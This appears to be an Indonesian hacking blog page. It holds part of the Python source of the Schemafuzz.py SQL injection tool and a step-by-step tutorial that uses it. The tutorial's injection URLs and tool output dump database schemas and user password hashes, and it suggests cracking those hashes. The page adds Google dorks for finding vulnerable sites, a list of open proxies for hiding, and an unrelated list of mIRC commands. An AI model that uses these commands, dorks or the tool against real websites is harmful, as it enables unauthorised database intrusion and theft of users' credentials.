match = match[0][2:].split("\x1e")
if cur_db != match[0]:
cur_db = match[0]
file.write("\n[Database]: "+match[0]+"\n")
print "[Database]: "+match[0]
print "[Table: Columns]"
file.write("[Table: Columns]")
if cur_table != match[1]:
print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
cur_table = match[1]
table_num = int(table_num) + 1
else:
sys.stdout.write(",%s" % (match[2]))
file.write(","+match[2])
sys.stdout.flush()
#Gathering Databases only
elif mode == "--dbs":
match = match[0]
file.write("\n["+str(num)+"]"+str(match))
print "["+str(num)+"]",match
table_num = int(table_num) + 1
#Collect data from tables & columns
elif mode == "--dump":
match = re.findall("\x1e\x1e+[\w\d\?\/\_\:\.\=\s\S\-+]+\x1e\x1e",source)
match = match[0].strip("\x1e").split("\x1e")
if arg_verbose == 1:
print "\n["+str(num)+"] ",
file.write("\n["+str(num)+"] ",)
else:
print
file.write("\n")
for ddata in match:
if ddata == "":
ddata = "NoDataInColumn"
sys.stdout.write("%s:" % (ddata))
file.write("%s:" % ddata)
sys.stdout.flush()
table_num = int(table_num) + 1
else:
if mode == "--dump":
sys.stdout.write("\n[%s] No data" % (num))
file.write("%s:" % ddata)
table_num = int(table_num) + 1
else:
break
num = int(num) + 1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass

#Full SQLi information_schema Enumeration
if mode == "--full":
while 1:
try:
proxy_num+=1
gets+=1
source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
match = match[0][2:].split("\x1e")
if cur_db != match[0]:
cur_db = match[0]
file.write("\n\n[Database]: "+match[0]+"\n")
print "\n\n[Database]: "+match[0]
print "[Table: Columns]"
file.write("[Table: Columns]")
table_num=0
if cur_table != match[1]:
print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
cur_table = match[1]
table_num = int(table_num) + 1
else:
sys.stdout.write(",%s" % (match[2]))
file.write(","+match[2])
sys.stdout.flush()
else:
if num == 0:
print "\n[-] No Data Found"
break
num = int(num) + 1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass

#Lets wrap it up!
if mode == "--schema" or mode == "--full" or mode == "--dump":
print ""
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] [%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Silakan Check File", dbt,"\n"
file.close()

Copy Script Ini Menjadi Schemafuzz.py

Tutorial SQL Injection dengan Menggunakan Schemafuzz.py

Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de

tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut


pertama-tama kita cari target dengan google dan ditemukan:

misalnya

http://127.0.0.1/site/phpweb/forum.php?forum=1


sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini ./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini

--schema, --dbs, --dump, --fuzz, --info, --full, --findcol


langkah pertama

----------------

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--

[+] Evasion Used: "+" "--"

[+] 01:32:04

[+] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,3,4,5,

[+] Column Length is: 6

[+] Found null column at column #: 1

[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--

[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

[-] Done!


langkah kedua

--------------

setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini


./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:37:09

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Number of tables names to be fuzzed: 354

[+] Number of column names to be fuzzed: 263

[+] Searching for tables and columns...


[+] Found a table called: mysql.user


[+] Now searching for columns inside table "mysql.user"

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table "mysql.user" for columns!


[-] [01:37:48]

[-] Total URL Requests 618

[-] Done


langkah ketiga

---------------

Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya


./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings


[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:43:11

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing Tables & Columns from database "webthings"

[+] Number of Tables: 33


[Database]: webthings

[Table: Columns]

[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

[1]wt_articles_title: article_id,category,title,active,date,userid,views

[2]wt_articlescat: cod,category

[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

[4]wt_banners_log: banner,date,views,clicks,sessions

[5]wt_banners_rawlog: banner,type,date,session

[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

[7]wt_comments: cod,type,link,date,userid,comment

[8]wt_config: id,config

[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text

[10]wt_downloadscat: cod,ref,name,descr

[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

[12]wt_faq_topics: cod,name

[13]wt_forum_log_topics: uid,msgid,logtime,notifysent

[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

[15]wt_forums: cod,title,descr,locked,notifies,register

[16]wt_forums_mod: forum,userid,type

[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

[18]wt_links: id,category,active,name,url,count,descr,obs

[19]wt_linkscat: cod,name,descr,parent_id

[20]wt_menu: id,pos,title,url,type,newwindow,lang

[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

[22]wt_newscat: cod,name,image

[23]wt_online: id,time,uid

[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

[25]wt_picofdaycat: id,name,description

[26]wt_picofdaysel: date,picture_id,views,clicks

[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

[29]wt_user_access: userid,module

[30]wt_user_book: userid,cod_user

[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,

newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail


[-] [01:43:48]

[-] Total URL Requests 270

[-] Done


untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini


./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info

maka akan tampil seperti ini


[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:46:51

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a


[+] Do we have Access to MySQL Database: Yes <-- w00t w00t

[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--


[+] Do we have Access to Load_File: No


[-] [01:46:51]

[-] Total URL Requests 3

[-] Done


ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe


untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini


./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs

akan tampil seperti ini


[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:58:15

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing all databases current user has access too!

[+] Number of Databases: 1


[0]webthings


[-] [01:58:17]

[-] Total URL Requests 30

[-] Done


langkah selanjutnya

--------------------


cara untuk menemukan user dan password

kita gunakan perintah --dump -D namadatabase -T namatabel -C namakolom

setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthing -T wt_users -C name,password


eing ing eng....

jreennnng....keluar deh user ama passwordnya

hasilnya dibawah ini


[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 02:08:47

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Dumping data from database "webthings" Table "wt_users"

[+] Column(s) ['name', 'password']

[+] Number of Rows: 2


[0] admin:e00b29d5b34c3f78df09d45921c9ec47:

[1] user:098f6bcd4621d373cade4e832627b4f6:


[-] [02:08:48]

[-] Total URL Requests 4

[-] Done


jangan lupa kita selalu mengecek schemafuzzlog.txt nya

setelah itu tinggal kita meng crack passwordnya pake program

gemana rekan2 gampang kan pake schemafuzz

NB:

Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya

Ingat kita jgn terlalu dimanjakan dengan program yang siap pakai, sebab kita gak ngerti dasar-dasarnya, asal-usulnya...

program tersebut hanya bertujuan untuk membantu kita apabila kita tidak menemukan sesuatu yang muncul dalam site target.

PERHATIAN!!!! jangan merusak, jadikan tutorial ini sebagai pembelajaran bagi para admin maupun yang pengen belajar sql injection serta newbie seperti saya

Tulisan ini silahkan di copas dengan menyertakan kredit pengarangnya.

Dork SQL injection

Dork: SQL Injection

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()

inurl:"id=" & intext:"Warning: mysql_fetch_array()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: is_writable()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: Unknown()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: pg_exec()
javascript:void(0)
inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: mysql_query()

inurl:"id=" & intext:"Warning: array_merge()

inurl:"id=" & intext:"Warning: preg_match()

inurl:"id=" & intext:"Warning: ilesize()

inurl:"id=" & intext:"Warning: filesize()

inurl:"id=" & intext:"Warning: require()

Kumpulan Proxy

60.12.227.208:80
60.12.227.246:80
88.191.98.15:3128
122.224.97.84:80
193.55.112.41:3128
218.204.106.150:8080
58.222.254.11:3128
140.113.152.201:8080
201.48.209.2:80
146.57.249.98:3128
58.248.29.7:3128
219.254.32.40:8080
219.93.178.162:3128
130.75.87.84:3124
194.176.176.82:8080
209.11.82.88:3128
66.198.41.11:3128
61.53.137.50:8080
67.69.254.244:80
201.48.209.2:3128
125.29.54.44:8080
59.56.174.199:808
60.190.151.77:8088
222.75.165.130:8080
130.75.87.83:3124
222.73.228.7:80
128.238.88.65:3127
125.141.221.165:80
61.139.73.6:8080
125.141.221.135:80
208.117.131.116:3127
193.174.67.186:3124
218.97.194.94:80
70.32.40.18:3128
91.200.233.195:3128
146.57.249.98:3127
193.167.182.132:3127
121.22.29.181:80
143.107.111.195:3127
192.33.90.67:3127
129.24.211.26:3124
89.25.159.62:3128
217.149.243.196:80
200.20.9.77:3128
84.14.231.89:8080
193.147.162.166:3124
128.232.103.203:3127
221.2.216.38:8080
200.179.72.132:80
121.8.124.42:1080
125.65.113.53:80
220.227.47.6:8080
61.19.222.7:80
218.4.65.118:8080
143.107.111.195:3124
128.232.103.202:3124
196.25.52.36:3128
128.113.226.235:3124
130.88.203.27:3128
209.20.78.177:3128
221.224.53.84:3128
58.22.101.251:80
59.173.12.137:80
194.42.17.124:3127
61.8.77.18:8080
128.232.103.203:3128
89.162.219.98:3128
67.69.254.251:80
84.42.51.129:3128
132.68.237.36:3124
88.80.223.58:3128
203.197.194.172:8080
67.69.254.252:80
59.120.244.23:3128
193.167.182.130:3127
121.242.41.67:3128
220.227.47.8:8080
72.55.191.6:3128
203.178.133.3:3128
212.117.162.228:3128
128.232.103.203:3124
61.16.247.44:3128
67.69.254.247:80
203.178.133.11:3127
222.255.28.231:3128
213.248.50.104:8080
67.69.254.246:80
210.1.58.20:80
128.113.226.235:3128
203.156.255.217:80
137.226.138.156:3127
189.21.103.178:3128
67.69.254.248:80
72.51.31.19:8080
193.174.67.187:3128
58.68.35.54:3128
201.48.125.1:3128
200.199.231.100:3128
220.181.32.42:8080
119.160.199.4:3128
222.141.69.247:80
118.98.185.4:3128
85.93.26.3:3128
89.207.240.235:3128
89.211.49.84:3128
210.212.20.202:3128
201.62.152.239:8080
201.72.145.44:3128
200.181.48.125:3128
60.30.83.220:8080
189.80.131.219:3128
118.122.112.49:80
200.242.168.2:3128
88.191.99.139:3128
200.37.73.220:3128
200.49.141.51:8080
128.187.72.70:3128
200.59.10.42:8080
200.71.149.10:3128
200.96.194.164:3128
200.199.25.181:3128
200.199.25.142:8080
200.148.170.66:3128
200.35.107.214:3128
117.102.90.233:8080
117.102.85.178:8080
212.156.96.206:8080
200.233.108.85:3128
217.167.7.6:80
119.70.40.101:8080
130.37.198.243:3128
207.245.247.196:80
202.206.100.39:3128
133.1.74.162:3127
213.253.216.26:3128
66.135.33.17:3128
193.55.112.41:3127
190.216.249.4:80
192.33.210.17:3124
193.55.112.41:3124
72.52.220.188:3128
137.226.138.156:3128
123.127.41.44:3128
190.216.249.4:3128
58.214.247.198:1080
90.182.196.131:3128
137.226.138.156:3124
81.177.3.10:80
192.33.90.69:3127
60.248.28.228:3128
59.57.244.194:1080
192.33.210.17:3128
91.193.68.65:3128
70.86.138.210:8131
124.30.18.246:3128
193.167.187.188:3124
201.17.130.41:3128
200.175.44.195:3128
193.167.187.187:3128
123.130.112.17:8080
61.220.102.102:3128
171.66.3.182:3127
212.123.91.61:89
217.133.80.15:3128
200.37.63.11:8080
134.226.52.35:3124
211.95.176.6:808
202.95.131.188:554
121.22.29.182:80
158.64.10.152:80
211.161.197.182:80
222.180.17.45:808
200.186.35.2:3128
121.22.29.183:80
194.44.170.81:3128
121.22.29.180:80
134.226.52.34:3124
81.177.3.10:3128
221.11.27.110:8080
200.131.36.198:8080
79.99.43.128:3128
203.146.51.2:80
201.213.122.19:8080
72.188.172.83:9090
200.223.181.45:3128
222.83.215.36:808
58.35.94.112:8080
128.113.226.235:3127
189.124.154.100:3128
200.178.159.133:3128
118.122.112.47:80
117.240.88.12:8080
189.52.226.128:3128
77.222.147.58:3128
91.102.224.252:8080
200.119.240.115:3128
213.129.249.144:80
189.19.229.15:3128
87.252.3.67:3128
159.148.82.4:3128
220.112.40.251:1080
201.86.70.190:80
89.234.27.15:80
82.193.236.160:3128
200.220.142.10:3128
212.12.146.244:3128
202.181.113.66:80
212.123.91.61:81
220.231.180.251:1080
218.111.124.24:8080
222.74.200.17:1080
86.105.181.238:3128
124.164.247.43:3128
192.228.196.72:80
200.195.17.74:80
203.82.52.210:8080
192.228.196.134:80
192.228.196.133:80
200.144.28.60:3128
91.103.24.13:3128
76.30.187.68:9090
203.84.156.78:80
69.244.162.215:2301
190.200.251.251:8080
201.47.187.239:3128
200.171.175.157:6588
70.82.140.29:9090
164.128.242.62:8080
76.107.137.6:9090
218.92.8.165:8080
212.44.61.185:3128
201.17.6.199:3128
211.115.185.42:8080
211.115.185.41:8080
201.25.119.35:3128
200.41.60.135:3128
202.107.231.157:8080
122.138.14.150:8080
81.213.214.170:3128
134.002.172.252:3127
194.42.17.124:3124

Command mIRC

Anda mungkin sering chatting di mIRC, tapi belum tahu apa saja seh command-command
yang ada di mIRC

Berikut daftar command-command yang ada di mIRC :

ChanServ

1. Register Channel = /cs register (#channel) (password) (desikripsi)

2. Identify Channel = /cs identify (#channel) (password)

3. Successor = /cs set (#channel) successor (nickname)

4. Drop Channel = /cs drop (#channel)

5. Ganti Pass Channel = /cs set (#channel) passwd (password lama) (password
baru)

6. Lupa Pass Channel = /cs sendpass (#channel) (email)

7. Founder Baru (Identify #Channel Dulu) = /cs set (#channel) founder

8. Mailblock = /cs set (#channel) mailblock (on/off)

9. Private = /cs set (#channel) private (on/off)

10. Set Description = /cs set (#channel) desc (deskripsinya)

11. Set Topic = /cs set (#channel) topik (topiknya)

12. Set URL = /cs set (#channel) url (alamat url-nya)

13. Set Mlock = /cs set (#channel) mlock (tulis modenya)

14. Set Restrict = /cs set (#channel) restrict (on/off)

15. Set KeepTopic = /cs set (#channel) keeptopic (on/off)

16. Set TopikLock = /cs set (#channel) topikclock (off/sop/founder)

17. Set Memo Channel = /cs set (#channel) memo (none/aop/sop/founder)

18. Set OP-Guard = /cs set (#channel) opguard (on/off)

19. Add/Del Sop = /cs sop (#channel) (add/del) (nick)

20. Add/Del Aop = /cs aop (#channel) (add/del) (nick)

21. Lihat List Op = /cs (aop/sop) (#channel) list

22. Akick Nick = /cs akick (#channel) (add/del) (Nick!*@*)

23. Akick Ident = /cs akick (#channel) (add/del) (*!ident@*)

24. Akick IP Address = /cs akick (#channel) (add/del) (*!*@IP Addressnya)

25. Akick List = /cs akick (#channel) list

26. Op List = /cs (sop/aop) (#channel) list

27. Lihat Akses = /cs why (#channel) (nick)

28. Unban = /cs unban (#channel) (nick)

29. Invite = /cs invite (#channel) (nick)

30. Info = /cs info (#channel)

31. Access Channel = /cs access (#channel) (nick op)

32. Count = /cs count (#channel)

NickServ :

1. Register Nick = /ns register (password) (email)

2. Identify Nick = /ns identify (password)

3. Ganti Pass = /ns set passwd (password lama) (password baru)

4. Enforce = /ns set enforce (on/off)

5. Kill Ghost = /ns ghost (nick) (password)

6. Kill = /ns set kill (on/off)

7. Recover = /ns recover (nick) (password)

8. Release = /ns release (nick) (password)

9. Drop = /ns drop (nick)

10. No Op = /ns set noop (on/off)

11. No Memo = /ns set nomemo (on/off)

12. Info = /ns info (nickname)

13. URL = /ns set url (http:// )

14. Ganti Email = /ns set email (password) (emailnya)

15. Showemail = /ns set showemail (on/off)

16. MailBlock = /ns set mailblock (on/off)

MemoServ :

1. Send Nick = /ms send (nickname) (pesan)

2. Send OP = /ms send (#channel) (pesan)

3. Send SOP = /ms sendsop (#channel) (pesan)

4. Lihat Memo = /ms list

5. Baca Memo = /ms read (no. list memo)

6. Hapus Memo = /ms del (no. list memo)

7. Hapus Semua = /ms del all

Perintah Dasar mIRC :

1. Ganti nick = /nick (nick baru)

2. Notice = /notice (nick) (pesan)

3. Masuk Channel = /join (#channel)

4. Keluar Channel = /part (#channel)

5. Keluar IRC = /quit (pesan)

6. Ganti Server = /server (nama server)

7. Private = /query (nick)

8. Invite = /invite (nick) (#channel)

9. Mode I = /mode (nick) +I

10. Ignore = /ignore (nick)

11. Action = /me (pesan)

12. Whois = /whois (nick)

13. Away = /away (pesan)

14. Balik Away = /away

15. Ping = /ping (nick)

16. Bersihkan layar = /clear

Perintah Standar Untuk OP Channel :

/kick (#channel) (nick) = kick user

/topik (#channel) (topiknya) = mengganti topik channel

/kick (#channel) (nick) (alasan) = kick user dengan alasan

/mode (#channel) +b *!*@IPnya = Band IP user, missal /mode #channel +b *!*@125.123.19.*

/mode (#channel) +b nick!*@* = Ban nick user, missal /mode #channel +b nick!*@*

/mode (#channel) +o (nick) = memberikan Op pada user

/mode (#channel) +v (nick) = memberikan voice pada user

/mode (#channel) -o (nick) = menurunkan user agar tidak Op lagi

/mode (#channel) -v (nick) = mengambil voice user

/mode (#channel) +/- ntispklRrmc = set mode channel

/channel = melihat mode dan ban list channel

Semoga Bermanfaat bagi anda


By : apiq_malfin

Thank's To All My Friend :)